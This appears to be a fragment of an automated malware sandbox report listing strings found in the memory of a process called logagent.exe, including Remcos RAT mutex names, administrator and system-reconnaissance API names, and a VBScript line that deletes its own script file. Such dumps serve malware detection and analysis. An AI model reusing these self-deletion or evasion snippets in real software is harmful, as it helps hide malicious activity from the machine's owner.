Source: logagent.exe, 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.1 Propth_unencoverridev
Source: C:\Windows\SysWOW64\logagent.exe Code function: cmd.exe 3_2_00402B8A